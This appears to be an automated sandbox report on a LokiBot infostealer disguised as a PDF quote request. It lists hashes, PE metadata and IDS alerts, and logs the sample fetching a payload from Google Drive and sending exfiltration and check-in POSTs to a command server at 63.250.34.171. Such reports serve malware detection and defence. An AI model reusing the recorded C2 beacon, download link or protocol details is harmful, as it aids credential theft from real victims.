                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:531794
                            Start date:01.12.2021
                            Start time:11:55:11
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 6m 6s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:RFQ 001030112021#U00b7pdf.exe
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:16
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.rans.troj.spyw.evad.winEXE@3/2@2/3
                            EGA Information:
                            • Successful, ratio: 100%
                            HDC Information:
                            • Successful, ratio: 5.8% (good quality ratio 3.5%)
                            • Quality average: 32%
                            • Quality standard deviation: 30.7%
                            HCA Information:Failed
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Found application associated with file extension: .exe
                            Warnings:
                            • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 23.211.6.115
                            • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, store-images.s-microsoft.com, ctldl.windowsupdate.com, store-images.s-microsoft.com-c.edgekey.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.

                            Simulations

                            Behavior and APIs

                            Time | Type | Description
                            11:57:52 | API Interceptor | 1x Sleep call for process: RFQ 001030112021#U00b7pdf.exe modified

                            Joe Sandbox View / Context

                            IPs

                            Match | Associated Sample Name / URL | Detection | Context
                            63.250.34.171 | Anexo I e II do convite#U00b7pdf.exe | malicious | 63.250.34.171/tickets.php?id=156
                            63.250.34.171 | QfXk1qRIDN.exe | malicious | 63.250.34.171/tickets.php?id=537
                            63.250.34.171 | P.I..xlsx | malicious | 63.250.34.171/tickets.php?id=537
                            63.250.34.171 | Lkinv70923.exe | malicious | 63.250.34.171/tickets.php?id=550
                            63.250.34.171 | ODkVvBA5vb.exe | malicious | 63.250.34.171/tickets.php?id=537
                            63.250.34.171 | PROFORMA INVOICE.xlsx | malicious | 63.250.34.171/tickets.php?id=537
                            63.250.34.171 | Product_Specification_Sheet.xlsx | malicious | 63.250.34.171/tickets.php?id=538
                            63.250.34.171 | loader2.exe | malicious | 63.250.34.171/tickets.php?id=550
                            63.250.34.171 | 3MBqpjNC1q.exe | malicious | 63.250.34.171/tickets.php?id=537
                            63.250.34.171 | Ship particulars.xlsx | malicious | 63.250.34.171/tickets.php?id=537
                            63.250.34.171 | DHL Receipt_AWB8114704847788.exe | malicious | 63.250.34.171/tickets.php?id=552
                            63.250.34.171 | HalkbankEkstre20211124073809405251,pdf.exe | malicious | 63.250.34.171/tickets.php?id=562
                            63.250.34.171 | Order EnquiryCRM0754000001965-pdf(109KB).exe | malicious | 63.250.34.171/tickets.php?id=544

                            Domains

                            No context

                            ASN


                            JA3 Fingerprints

                            Match: 37f463bf4616ecd445d4a1937da06e19

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Roaming\C79A3B\B52B3F.lck
                            Process:C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe
                            File Type:very short file (no magic)
                            Category:dropped
                            Size (bytes):1
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3:U:U
                            MD5:C4CA4238A0B923820DCC509A6F75849B
                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview: 1

                            C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3853321935-2125563209-4053062332-1002\bc49718863ee53e026d805ec372039e9_d06ed635-68f6-4e9a-955c-4899f5f57b9a
                            Process:C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe
                            File Type:data
                            Category:dropped
                            Size (bytes):46
                            Entropy (8bit):0.0
                            Encrypted:false
                            SSDEEP:3::
                            MD5:D898504A722BFF1524134C6AB6A5EAA5
                            SHA1:E0FDC90C2CA2A0219C99D2758E68C18875A3E11E
                            SHA-256:878F32F76B159494F5A39F9321616C6068CDB82E88DF89BCC739BBC1EA78E1F9
                            SHA-512:26A4398BFFB0C0AEF9A6EC53CD3367A2D0ABF2F70097F711BBBF1E9E32FD9F1A72121691BB6A39EEB55D596EDD527934E541B4DEFB3B1426B1D1A6429804DC61
                            Malicious:false
                            Reputation:moderate, very likely benign file
                            Preview: ..............................................

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):5.965368386613768
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:RFQ 001030112021#U00b7pdf.exe
                            File size:115848
                            MD5:754fa9ff30ec6e1cd7a29837adeb7a8b
                            SHA1:09472c720424ab26d13b7dd8cc2e199a826a88d1
                            SHA256:957ac63b9471fe11ba63a0bca4759741b305525ef1c4a2e4be262ed4464a2935
                            SHA512:6336063e9eb21cb84d7fc19a89440ee3daa8d169fad56593874250a6056d768990dade8e0e6a460fe7cc18732ba1530032638f4fc67e168fd7dc13547afdf29a
                            SSDEEP:1536:Wgu1hdt0wzWlYifmvhLYQ0WrWiPI5DXGVl3C5Hj8BC94HfnjZvD:Wgu/4OiQ0IWcGD8tiDB2HrZL
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............i...i...i...d...i.Rich..i.................PE..L......K.....................0....................@........................

                            File Icon

                            Icon Hash:20047c7c70f0e004

                            Static PE Info

                            General

                            Entrypoint:0x40131c
                            Entrypoint Section:.text
                            Digitally signed:true
                            Imagebase:0x400000
                            Subsystem:windows gui
                            Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                            DLL Characteristics:
                            Time Stamp:0x4BED1892 [Fri May 14 09:32:02 2010 UTC]
                            TLS Callbacks:
                            CLR (.Net) Version:
                            OS Version Major:4
                            OS Version Minor:0
                            File Version Major:4
                            File Version Minor:0
                            Subsystem Version Major:4
                            Subsystem Version Minor:0
                            Import Hash:bee9d652e25bf42465265f6582df5734

                            Authenticode Signature

                            Signature Valid:false
                            Signature Issuer:E=Form_PATE@Form_Acoria.For, CN=Form_Cadd, OU=Form_Uddannel6, O=Form_Skinti, L=Form_Kabi, S=Form_Navi, C=AO
                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                            Error Number:-2146762487
                            Not Before, Not After
                            • 11/30/2021 8:18:37 AM 11/30/2022 8:18:37 AM
                            Subject Chain
                            • E=Form_PATE@Form_Acoria.For, CN=Form_Cadd, OU=Form_Uddannel6, O=Form_Skinti, L=Form_Kabi, S=Form_Navi, C=AO
                            Version:3
                            Thumbprint MD5:359B4CED88404A3FDA67CE83D420DD95
                            Thumbprint SHA-1:9D27A6445B658421E08629FAD425F379F07B3F1D
                            Thumbprint SHA-256:2D79E6E664C8C1FEBB518222BADCE0603E88D37057AB1A1A6ED41915F314FC18
                            Serial:00

                            Entrypoint Preview


                            Data Directories

                            | Name | Virtual Address | Virtual Size | Is in Section |
                            |---|---|---|---|
                            | IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
                            | IMAGE_DIRECTORY_ENTRY_IMPORT | 0x194f4 | 0x28 | .text |
                            | IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x1c000 | 0x93d | .rsrc |
                            | IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
                            | IMAGE_DIRECTORY_ENTRY_SECURITY | 0x1b000 | 0x1488 | |
                            | IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 | |
                            | IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 | |
                            | IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
                            | IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
                            | IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
                            | IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
                            | IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x220 | 0x20 | |
                            | IMAGE_DIRECTORY_ENTRY_IAT | 0x1000 | 0x140 | .text |
                            | IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
                            | IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
                            | IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

                            Sections

                            | Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
                            |---|---|---|---|---|---|---|---|---|
                            | .text | 0x1000 | 0x186ec | 0x19000 | False | 0.474736328125 | data | 6.06898584933 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
                            | .data | 0x1a000 | 0x1c14 | 0x0 | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
                            | .rsrc | 0x1c000 | 0x93d | 0x1000 | False | 0.178466796875 | data | 2.05157572182 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |

                            Resources

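                            | Name | RVA | Size | Type | Language | Country |
                            |---|---|---|---|---|---|
                            | OK | 0x1c918 | 0x25 | ASCII text, with CRLF line terminators | English | United States |
                            | RT_ICON | 0x1c7e8 | 0x130 | data | | |
                            | RT_ICON | 0x1c500 | 0x2e8 | data | | |
                            | RT_ICON | 0x1c3d8 | 0x128 | GLS_BINARY_LSB_FIRST | | |
                            | RT_GROUP_ICON | 0x1c3a8 | 0x30 | data | | |
                            | RT_VERSION | 0x1c1a0 | 0x208 | data | Chinese | Taiwan |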

                            Imports

                            | DLL | Import |
                            |---|---|
                            | MSVBVM60.DLL | MethCallEngine, EVENT_SINK_AddRef, DllFunctionCall, EVENT_SINK_Release, EVENT_SINK_QueryInterface, __vbaExceptHandler |

                            Version Infos

                            | Description | Data |
                            |---|---|
                            | Translation | 0x0404 0x04b0 |
                            | ProductVersion | 1.00 |
                            | InternalName | Form_Fejlfunkt |
                            | FileVersion | 1.00 |
                            | OriginalFilename | Form_Fejlfunkt.exe |
                            | ProductName | Form_Chuckhole3 |

                            Possible Origin

                            | Language of compilation system | Country where language is spoken |
                            |---|---|
                            | English | United States |
                            | Chinese | Taiwan |

                            Network Behavior

                            Snort IDS Alerts

                            | Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
                            |---|---|---|---|---|---|---|---|
                            | 12/01/21-11:57:40.688250 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49805 | 80 | 192.168.2.4 | 63.250.34.171 |
                            | 12/01/21-11:57:40.688250 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49805 | 80 | 192.168.2.4 | 63.250.34.171 |
                            | 12/01/21-11:57:40.688250 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49805 | 80 | 192.168.2.4 | 63.250.34.171 |
                            | 12/01/21-11:57:40.688250 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49805 | 80 | 192.168.2.4 | 63.250.34.171 |
                            | 12/01/21-11:57:41.628362 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49805 | 63.250.34.171 | 192.168.2.4 |
                            | 12/01/21-11:57:47.999523 | TCP | 2024312 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1 | 49824 | 80 | 192.168.2.4 | 63.250.34.171 |
                            | 12/01/21-11:57:47.999523 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49824 | 80 | 192.168.2.4 | 63.250.34.171 |
                            | 12/01/21-11:57:47.999523 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49824 | 80 | 192.168.2.4 | 63.250.34.171 |
                            | 12/01/21-11:57:47.999523 | TCP | 2024317 | ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2 | 49824 | 80 | 192.168.2.4 | 63.250.34.171 |
                            | 12/01/21-11:57:49.049099 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49824 | 63.250.34.171 | 192.168.2.4 |
                            | 12/01/21-11:57:52.652789 | TCP | 2024313 | ET TROJAN LokiBot Request for C2 Commands Detected M1 | 49825 | 80 | 192.168.2.4 | 63.250.34.171 |
                            | 12/01/21-11:57:52.652789 | TCP | 2021641 | ET TROJAN LokiBot User-Agent (Charon/Inferno) | 49825 | 80 | 192.168.2.4 | 63.250.34.171 |
                            | 12/01/21-11:57:52.652789 | TCP | 2025381 | ET TROJAN LokiBot Checkin | 49825 | 80 | 192.168.2.4 | 63.250.34.171 |
                            | 12/01/21-11:57:52.652789 | TCP | 2024318 | ET TROJAN LokiBot Request for C2 Commands Detected M2 | 49825 | 80 | 192.168.2.4 | 63.250.34.171 |
                            | 12/01/21-11:57:53.605790 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49825 | 63.250.34.171 | 192.168.2.4 |

                            Network Port Distribution

                            TCP Packets

                            Dec 1, 2021 11:57:39.054847956 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.054986000 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.055001974 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.055164099 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.056226015 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.056298971 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.056318045 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.056596994 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.056895018 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.056981087 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.056998014 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.057332993 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.057405949 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.057429075 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.058238983 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.058259964 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.059417963 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.059495926 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.059509993 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.059531927 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.059582949 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.060086012 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.060220957 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.060291052 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.060313940 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.060336113 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:39.060405970 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.063785076 CET49796443192.168.2.4216.58.198.33
                            Dec 1, 2021 11:57:39.063815117 CET44349796216.58.198.33192.168.2.4
                            Dec 1, 2021 11:57:40.517846107 CET4980580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:40.683846951 CET804980563.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:40.683958054 CET4980580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:40.688250065 CET4980580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:40.853789091 CET804980563.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:40.853878021 CET4980580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:41.018997908 CET804980563.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:41.628361940 CET804980563.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:41.628397942 CET804980563.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:41.628498077 CET4980580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:41.629040956 CET4980580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:41.793761015 CET804980563.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:47.825213909 CET4982480192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:47.990793943 CET804982463.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:47.992289066 CET4982480192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:47.999522924 CET4982480192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:48.164722919 CET804982463.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:48.165203094 CET4982480192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:48.336815119 CET804982463.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:49.049098969 CET804982463.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:49.049149036 CET804982463.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:49.049231052 CET4982480192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:49.049957991 CET4982480192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:49.215148926 CET804982463.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:52.478847027 CET4982580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:52.647747040 CET804982563.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:52.647856951 CET4982580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:52.652789116 CET4982580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:52.821069002 CET804982563.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:52.821244955 CET4982580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:52.991245985 CET804982563.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:53.605789900 CET804982563.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:53.605823040 CET804982563.250.34.171192.168.2.4
                            Dec 1, 2021 11:57:53.605910063 CET4982580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:53.606673002 CET4982580192.168.2.463.250.34.171
                            Dec 1, 2021 11:57:53.774986029 CET804982563.250.34.171192.168.2.4

                            UDP Packets

                            Timestamp | Source Port | Dest Port | Source IP | Dest IP
                            Dec 1, 2021 11:57:37.730926991 CET | 56627 | 53 | 192.168.2.4 | 8.8.8.8
                            Dec 1, 2021 11:57:37.750525951 CET | 53 | 56627 | 8.8.8.8 | 192.168.2.4
                            Dec 1, 2021 11:57:38.664941072 CET | 63116 | 53 | 192.168.2.4 | 8.8.8.8
                            Dec 1, 2021 11:57:38.704154968 CET | 53 | 63116 | 8.8.8.8 | 192.168.2.4

                            DNS Queries

                            Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                            Dec 1, 2021 11:57:37.730926991 CET | 192.168.2.4 | 8.8.8.8 | 0x81c | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001)
                            Dec 1, 2021 11:57:38.664941072 CET | 192.168.2.4 | 8.8.8.8 | 0xfb9c | Standard query (0) | doc-00-50-docs.googleusercontent.com | A (IP address) | IN (0x0001)

                            DNS Answers

                            Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                            Dec 1, 2021 11:57:37.750525951 CET | 8.8.8.8 | 192.168.2.4 | 0x81c | No error (0) | drive.google.com | - | 142.250.180.110 | A (IP address) | IN (0x0001)
                            Dec 1, 2021 11:57:38.704154968 CET | 8.8.8.8 | 192.168.2.4 | 0xfb9c | No error (0) | doc-00-50-docs.googleusercontent.com | googlehosted.l.googleusercontent.com | - | CNAME (Canonical name) | IN (0x0001)
                            Dec 1, 2021 11:57:38.704154968 CET | 8.8.8.8 | 192.168.2.4 | 0xfb9c | No error (0) | googlehosted.l.googleusercontent.com | - | 216.58.198.33 | A (IP address) | IN (0x0001)

                            HTTP Request Dependency Graph

                            • drive.google.com
                            • doc-00-50-docs.googleusercontent.com
                            • 63.250.34.171

                            HTTP Packets

                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            0 | 192.168.2.4 | 49792 | 142.250.180.110 | 443 | C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe
                            Timestamp | kBytes transferred | Direction | Data


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            1 | 192.168.2.4 | 49796 | 216.58.198.33 | 443 | C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe
                            Timestamp | kBytes transferred | Direction | Data


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            2 | 192.168.2.4 | 49805 | 63.250.34.171 | 80 | C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Dec 1, 2021 11:57:40.688250065 CET | 2197 | OUT | POST /tickets.php?id=277 HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 63.250.34.171
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: AA495C78
                            Content-Length: 190
                            Connection: close
                            Dec 1, 2021 11:57:40.853878021 CET2200OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                            Data Ascii: 'ckav.rujones936905DESKTOP-716T771k08F9C4E9C79A3B52B3F739430SDERE
                            Dec 1, 2021 11:57:41.628361940 CET | 5958 | IN | HTTP/1.1 403 Forbidden
                            Date: Wed, 01 Dec 2021 10:57:40 GMT
                            Server: Apache/2.4.38 (Debian)
                            Content-Length: 287
                            Connection: close
                            Content-Type: text/html; charset=UTF-8
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            3 | 192.168.2.4 | 49824 | 63.250.34.171 | 80 | C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Dec 1, 2021 11:57:47.999522924 CET | 9681 | OUT | POST /tickets.php?id=277 HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 63.250.34.171
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: AA495C78
                            Content-Length: 190
                            Connection: close
                            Dec 1, 2021 11:57:48.165203094 CET9681OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                            Data Ascii: 'ckav.rujones936905DESKTOP-716T771+08F9C4E9C79A3B52B3F739430Hy9bt
                            Dec 1, 2021 11:57:49.049098969 CET | 9682 | IN | HTTP/1.1 403 Forbidden
                            Date: Wed, 01 Dec 2021 10:57:48 GMT
                            Server: Apache/2.4.38 (Debian)
                            Content-Length: 287
                            Connection: close
                            Content-Type: text/html; charset=UTF-8
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>


                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            4 | 192.168.2.4 | 49825 | 63.250.34.171 | 80 | C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe
                            Timestamp | kBytes transferred | Direction | Data
                            Dec 1, 2021 11:57:52.652789116 CET | 9682 | OUT | POST /tickets.php?id=277 HTTP/1.0
                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                            Host: 63.250.34.171
                            Accept: */*
                            Content-Type: application/octet-stream
                            Content-Encoding: binary
                            Content-Key: AA495C78
                            Content-Length: 163
                            Connection: close
                            Dec 1, 2021 11:57:52.821244955 CET9683OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 33 00 36 00 39 00 30 00 35 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                            Data Ascii: (ckav.rujones936905DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                            Dec 1, 2021 11:57:53.605789900 CET | 9685 | IN | HTTP/1.1 403 Forbidden
                            Date: Wed, 01 Dec 2021 10:57:52 GMT
                            Server: Apache/2.4.38 (Debian)
                            Content-Length: 287
                            Connection: close
                            Content-Type: text/html; charset=UTF-8
                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p><hr><address>Apache/2.4.38 (Debian) Server at 63.250.34.171 Port 80</address></body></html>


                            HTTPS Proxied Packets

                            Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                            0 | 192.168.2.4 | 49792 | 142.250.180.110 | 443 | C:\Users\user\Desktop\RFQ 001030112021#U00b7pdf.exe
                            Timestamp | kBytes transferred | Direction | Data
                            2021-12-01 10:57:38 UTC | 0 | OUT | GET /uc?export=download&id=1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb HTTP/1.1
                            User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                            Host: drive.google.com
                            Cache-Control: no-cache
                            Cookie: CONSENT=YES+GB.en-GB+V9+BX
                            2021-12-01 10:57:38 UTC | 0 | IN | HTTP/1.1 302 Moved Temporarily
                            Content-Type: text/html; charset=UTF-8
                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                            Pragma: no-cache
                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                            Date: Wed, 01 Dec 2021 10:57:38 GMT
                            Location: https://doc-00-50-docs.googleusercontent.com/docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/tmgkbuuoqg7e2eb3u8b2c66mt8m0nijc/1638356250000/03026244708369606156/*/1f5uP5o0CfHZv_GAVqkAqahPOSxgGlgCb?e=download
                            P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                            Report-To: {"group":"coop_gse_l9ocaq","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gse_l9ocaq"}]}
                            Content-Security-Policy: script-src 'nonce-c98Ige+CGajsmFHH8IHEQA' 'unsafe-inline' 'strict-dynamic' https: http: 'unsafe-eval';object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/drive-explorer/
                            Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="coop_gse_l9ocaq"
                            X-Content-Type-Options: nosniff
                            X-Frame-Options: SAMEORIGIN
                            X-XSS-Protection: 1; mode=block
                            Server: GSE
                            Set-Cookie: NID=511=RbH0ThAklRT-V2MEDXdyF7kXvVDjQs949XeFpwPKVsLL8jbEODyPuUS-e6qhb9kmhK5pUgxxD2bnncofWLeCSJkuRhKqpxTI72tVlkiH8iI0_AVtWqm6u-DqU5OVkuoXhiiQ_9HhwzUWa2mEKwwz7cfi0P4SihoXqPcEcZMZ1K4; expires=Thu, 02-Jun-2022 10:57:38 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
                            Accept-Ranges: none
                            Vary: Accept-Encoding
                            Connection: close
